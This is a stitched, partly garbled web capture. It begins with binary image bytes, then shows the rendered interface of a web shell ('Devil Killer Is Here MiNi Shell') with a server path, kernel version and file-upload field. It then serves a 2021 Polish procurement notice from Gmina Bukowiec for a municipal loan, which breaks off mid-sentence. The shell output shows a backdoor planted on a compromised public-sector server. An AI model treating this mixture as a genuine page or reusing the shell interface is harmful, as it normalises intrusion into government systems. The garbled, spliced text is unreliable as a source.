JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20210820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20210820/0015569501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Udzielenie i obsługa długoterminowego kredytu w wysokości 3.587.000,00 PLN na sfinansowanie planowanego deficytu gminy Bukowiec na 2021 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Bukowiec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350984</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dr Fl. Ceynowy 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bukowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523309310</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">523309312</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">skarbnik@bukowiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gm-bukowiec.rbip.mojregion.info/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Udzielenie i obsługa długoterminowego kredytu w wysokości 3.587.000,00 PLN na sfinansowanie planowanego deficytu gminy Bukowiec na 2021 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9925dc5a-0196-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00155695</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000055/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Udzielenie i obsługę długoterminowego kredytu w wysokości 3.587.000,00 PLN na sfinansowanie planowanego deficytu gminy Bukowiec na 2021 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gm-bukowiec.rbip.mojregion.info/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://bukowiec.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; <br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; <br/>c) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0; <br/>d) włączona obsługa JavaScript; <br/>e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarto w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RFiR.271.1.2021.HSK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.	Przedmiotem zamówienia jest udzielenie i obsługa kredytu długoterminowego <br/>w wysokości 3.587.000,00 zł na sfinansowanie planowanego deficytu budżetu Gminy Bukowiec na 2021 rok na częściowe pokrycie kosztów inwestycji: <br/>a) „Kształtowanie przestrzeni publicznej na terenie parku w Bukowcu” – kwota kredytu 237.000,00 zł,<br/>b) „Budowa drogi gminnej nr 030940C w miejscowości Gawroniec-budowa drogi dojazdowej do gruntów rolnych” – kwota kredytu 370.000,00 zł,<br/>c) „Budowa drogi gminnej nr 030949C na odcinku ok. 250 m w m. Branica” – kwota kredytu 140.000,00 zł,<br/>d) „Budowa przedszkola w Bukowcu z wyposażeniem” – kwota kredytu 2.840.000,00 zł,<br/><br/>4. Okres kredytowania: <br/>a) „Kształtowanie przestrzeni publicznej na terenie parku w Bukowcu” – od dnia zawarcia umowy do 31 maja 2033 r.<br/>b) „Budowa drogi gminnej nr 030940C w miejscowości Gawroniec-budowa drogi dojazdowej do gruntów rolnych” – od dnia zawarcia umowy do 30 listopada 2035 r.<br/>c) „Budowa drogi gminnej nr 030949C na odcinku ok. 250 m w m. Branica” – od dnia zawarcia umowy do 31 maja 2032 r.<br/>d) „Budowa przedszkola w Bukowcu z wyposażeniem” – od dnia zawarcia umowy do 30 listopada 2037 r.<br/>5. Uruchomienie kredytu planuje się od dnia (dzień uruchomienia podany orientacyjnie dla celów wyceny i sporządzenia oferty): <br/>a) „Kształtowanie przestrzeni publicznej na terenie parku w Bukowcu”: jedna transza 29 listopada 2021 r. kwota 237.000,00 zł.<br/>b) „Budowa drogi gminnej nr 030940C w miejscowości Gawroniec-budowa drogi dojazdowej do gruntów rolnych” – jedna transza 15 listopada 2021 r. kwota 370.000,00 zł.<br/>c) „Budowa drogi gminnej nr 030949C na odcinku ok. 250 m w m. Branica”: jedna transza 29 listopada 2021 r. kwota 140.000,00 zł.<br/>d) „Budowa przedszkola w Bukowcu z wyposażeniem” – dwie transze: 15 listopada 2021 r. kwota 1.800.000,00 zł, 20 grudnia 2021 r. kwota 1.040.000,00 zł.<br/>6. Okres spłaty kredytu:<br/>a) „Kształtowanie przestrzeni publicznej na terenie parku w Bukowcu” kwota 237.000,00 zł<br/>30.11.2023	6 000<br/>29.02.2024	6 000<br/>31.05.2024	6 000<br/>30.08.2024	6 000<br/>29.11.2024	6 000<br/>28.02.2025	6 000<br/>30.05.2025	6 000<br/>29.08.2025	6 000<br/>28.11.2025	6 000<br/>27.02.2026	6 000<br/>29.05.2026	6 000<br/>31.08.2026	6 000<br/>30.11.2026	6 000<br/>26.02.2027	6 000<br/>31.05.2027	6 000<br/>31.08.2027	6 000<br/>30.11.2027	6 000<br/>29.02.2028	6 000<br/>31.05.2028	6 000<br/>31.08.2028	6 000<br/>30.11.2028	6 000<br/>28.02.2029	6 000<br/>30.05.2029	6 000<br/>31.08.2029	6 000<br/>30.11.2029	6 000<br/>28.02.2030	6 000<br/>31.05.2030	6 000<br/>30.08.2030	6 000<br/>29.11.2030	6 000<br/>28.02.2031	6 000<br/>30.05.2031	6 000<br/>29.08.2031	6 000<br/>28.11.2031	6 000<br/>27.02.2032	6 000<br/>31.05.2032	6 000<br/>31.08.2032	6 000<br/>30.11.2032	6 000<br/>28.02.2033	6 000<br/>31.05.2033	9 000<br/><br/>b) „Budowa drogi gminnej nr 030940C w miejscowości Gawroniec-budowa drogi dojazdowej do gruntów rolnych” – 370.000,00 zł <br/>30.11.2023	10 000<br/>29.02.2024	7 500<br/>31.05.2024	7 500<br/>30.08.2024	7 500<br/>29.11.2024	7 500<br/>28.02.2025	7 500<br/>30.05.2025	7 500<br/>29.08.2025	7 500<br/>28.11.2025	7 500<br/>27.02.2026	7 500<br/>29.05.2026	7 500<br/>31.08.2026	7 500<br/>30.11.2026	7 500<br/>26.02.2027	7 500<br/>31.05.2027	7 500<br/>31.08.2027	7 500<br/>30.11.2027	7 500<br/>29.02.2028	7 500<br/>31.05.2028	7 500<br/>31.08.2028	7 500<br/>30.11.2028	7 500<br/>28.02.2029	7 500<br/>30.05.2029	7 500<br/>31.08.2029	7 500<br/>30.11.2029	7 500<br/>28.02.2030	7 500<br/>31.05.2030	7 500<br/>30.08.2030	7 500<br/>29.11.2030	7 500<br/>28.02.2031	7 500<br/>30.05.2031	7 500<br/>29.08.2031	7 500<br/>28.11.2031	7 500<br/>27.02.2032	7 500<br/>31.05.2032	7 500<br/>31.08.2032	7 500<br/>30.11.2032	7 500<br/>28.02.2033	7 500<br/>31.05.2033	7 500<br/>31.08.2033	7 500<br/>30.11.2033	7 500<br/>28.02.2034	7 500<br/>31.05.2034	7 500<br/>31.08.2034	7 500<br/>30.11.2034	7 500<br/>28.02.2035	7 500<br/>31.05.2035	7 500<br/>31.08.2035	7 500<br/>30.11.2035	7 500<br/><br/>b) „Budowa drogi gminnej nr 030949C na odcinku ok. 250 m w m. Branica” – 140.000,00 zł <br/>30.11.2023	4 000<br/>29.02.2024	4 000<br/>31.05.2024	4 000<br/>30.08.2024	4 000<br/>29.11.2024	4 000<br/>28.02.2025	4 000<br/>30.05.2025	4 000<br/>29.08.2025	4 000<br/>28.11.2025	4 000<br/>27.02.2026	4 000<br/>29.05.2026	4 000<br/>31.08.2026	4 000<br/>30.11.2026	4 000<br/>26.02.2027	4 000<br/>31.05.2027	4 000<br/>31.08.2027	4 000<br/>30.11.2027	4 000<br/>29.02.2028	4 000<br/>31.05.2028	4 000<br/>31.08.2028	4 000<br/>30.11.2028	4 000<br/>28.02.2029	4 000<br/>30.05.2029	4 000<br/>31.08.2029	4 000<br/>30.11.2029	4 000<br/>28.02.2030	4 000<br/>31.05.2030	4 000<br/>30.08.2030	4 000<br/>29.11.2030	4 000<br/>28.02.2031	4 000<br/>30.05.2031	4 000<br/>29.08.2031	4 000<br/>28.11.2031	4 000<br/>27.02.2032	4 000<br/>31.05.2032	4 000<br/><br/>b) „Budowa przedszkola w Bukowcu z wyposażeniem” – 2.840.000,00 zł <br/>30.11.2023	40 000<br/>29.02.2024	50 000<br/>31.05.2024	50 000<br/>30.08.2024	50 000<br/>29.11.2024	50 000<br/>28.02.2025	50 000<br/>30.05.2025	50 000<br/>29.08.2025	50 000<br/>28.11.2025	50 000<br/>27.02.2026	50 000<br/>29.05.2026	50 000<br/>31.08.2026	50 000<br/>30.11.2026	50 000<br/>26.02.2027	50 000<br/>31.05.2027	50 000<br/>31.08.2027	50 000<br/>30.11.2027	50 000<br/>29.02.2028	50 000<br/>31.05.2028	50 000<br/>31.08.2028	50 000<br/>30.11.2028	50 000<br/>28.02.2029	50 000<br/>30.05.2029	50 000<br/>31.08.2029	50 000<br/>30.11.2029	50 000<br/>28.02.2030	50 000<br/>31.05.2030	50 000<br/>30.08.2030	50 000<br/>29.11.2030	50 000<br/>28.02.2031	50 000<br/>30.05.2031	50 000<br/>29.08.2031	50 000<br/>28.11.2031	50 000<br/>27.02.2032	50 000<br/>31.05.2032	50 000<br/>31.08.2032	50 000<br/>30.11.2032	50 000<br/>28.02.2033	50 000<br/>31.05.2033	50 000<br/>31.08.2033	50 000<br/>30.11.2033	50 000<br/>28.02.2034	50 000<br/>31.05.2034	50 000<br/>31.08.2034	50 000<br/>30.11.2034	50 000<br/>28.02.2035	50 000<br/>31.05.2035	50 000<br/>31.08.2035	50 000<br/>30.11.2035	50 000<br/>29.02.2036	50 000<br/>30.05.2036	50 000<br/>29.08.2036	50 000<br/>28.11.2036	50 000<br/>27.02.2037	50 000<br/>29.05.2037	50 000<br/>31.08.2037	50 000<br/>30.11.2037	50 000<br/><br/>7. Spłata odsetek rozpocznie się od miesiąca następującego po miesiącu uruchomienia kredytu/transzy kredytu. Do wyliczenia ceny oraz w trakcie trwania umowy będzie obowiązywał kalendarz rzeczywisty tj. rok 365/366 dni (rzeczywista liczba dni w miesiącu). Harmonogram spłaty kredytu przewiduje spłatę odsetek w okresach miesięcznych w ostatnim roboczym dniu miesiąca.<br/>8. Oprocentowanie kredytu zmienne w stosunku rocznym oparte o zmienną stawkę WIBOR 3M (obowiązującą na pierwszy dzień miesiąca) powiększone o stałą marżę Banku. Celem przygotowania oferty w niniejszym postępowaniu Wykonawca winien przyjąć wysokość stawki WIBOR 3M na dzień 2021-07-30 (0,21%). Podstawą ustalenia wysokości stopy procentowej jest WIBOR 3M liczony jako średnia arytmetyczna wszystkich kwotowań z miesiąca kalendarzowego poprzedzającego miesiąc naliczania odsetek.<br/>9. Oprocentowanie kredytu będzie naliczone tylko od kwoty faktycznego zadłużenia, Wykonawca nie będzie pobierać opłat i prowizji bankowej od zaangażowania kredytu tj. salda niewykorzystanej części kredytu.<br/>10. Bank nie będzie pobierał jednorazowej prowizji za udzielenie kredytu, w tym za rozpatrzenie wniosku, za wypłatę transz, za zmianę harmonogramu, za aneksowanie umowy, za wcześniejszą spłatę, za otwarcie i obsługę rachunku na potrzeby kredytu.<br/>11. Bank nie będzie pobierać żadnych dodatkowych opłat i prowizji z tytułu udzielenia i obsługi kredytu poza wymienionymi w Specyfikacji Warunków Zamówienia.<br/>12. Dopuszcza się możliwość refundacji poniesionych wydatków na realizację zadań, o których mowa <br/>w pkt. 3.<br/>13. Zabezpieczenie spłaty kredytu stanowić będzie weksel in blanco z deklaracją wekslową przy kontrasygnacie Skarbnika Gminy. <br/>14. Gmina nie złoży oświadczenia o poddaniu się egzekucji w trybie art. 777 par. 1 pkt.5 k.p.c.<br/>15. Wykonawca jest zobowiązany do uwzględnienia w ofercie wszystkich kosztów związanych <br/>z realizacją zamówienia.<br/>16. Na rachunkach Gminy w bankach nie ciążą zajęcia egzekucyjne.<br/>17. Gmina nie posiada zaległych zobowiązań w bankach.<br/>18. W Gminie nie był prowadzony program postepowania naprawczego w rozumieniu ustawy z dnia 27.08.2009 r. o finansach publicznych.<br/>19. W Gminie nie były prowadzone za pośrednictwem komornika sądowego działania windykacyjne wszczynane na wniosek banków.<br/>20. Zamawiający nie posiada zobowiązań z tytułu wyemitowanych obligacji, wykupu wierzytelności, fortaitingu, faktoringu, eFinancingu, leasingu. Zamawiający zawarł umowę nienazwaną o terminie zapłaty dłuższym niż rok, związaną z finansowaniem usług, dostaw, robót budowlanych, które wywołują skutki ekonomiczne podobne do umowy pożyczki lub kredytu w wysokości 565.800 zł z terminem spłaty w latach 2022 - 2027. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66113000-5 - Usługi udzielania kredytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) Cena (C) - waga kryterium 60 %<br/>2) Termin wypłaty transzy kredytu (W) - waga kryterium 40 %<br/>Oferta najkorzystniejsza = C + W</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wypłaty transzy kredytu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dotyczy uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedłoży zezwolenie na prowadzenie działalności bankowej na terenie Polski, a także na realizację usług objętych przedmiotem zamówienia zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. 2020, poz. 1896, ze zm.), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe – inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo bankowe; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu wstępnym, o którym mowa w art. 125 upzp wraz z oświadczeniem wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu wstępnym, o którym mowa w art. 125 upzp.<br/>2) Zezwolenie na rozpoczęcie działalności bankowej, o którym mowa w art. 36 ustawy Prawo bankowe (Dz. U. 2020, poz. 1896, z późn. zm.), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe – inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy;<br/>3) Projekt umowy w sprawie realizacji zamówienia publicznego z uwzględnieniem postanowień wynikających z treści SWZ oraz danych zawartych w ofercie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale IX ust. 2 SWZ, składa 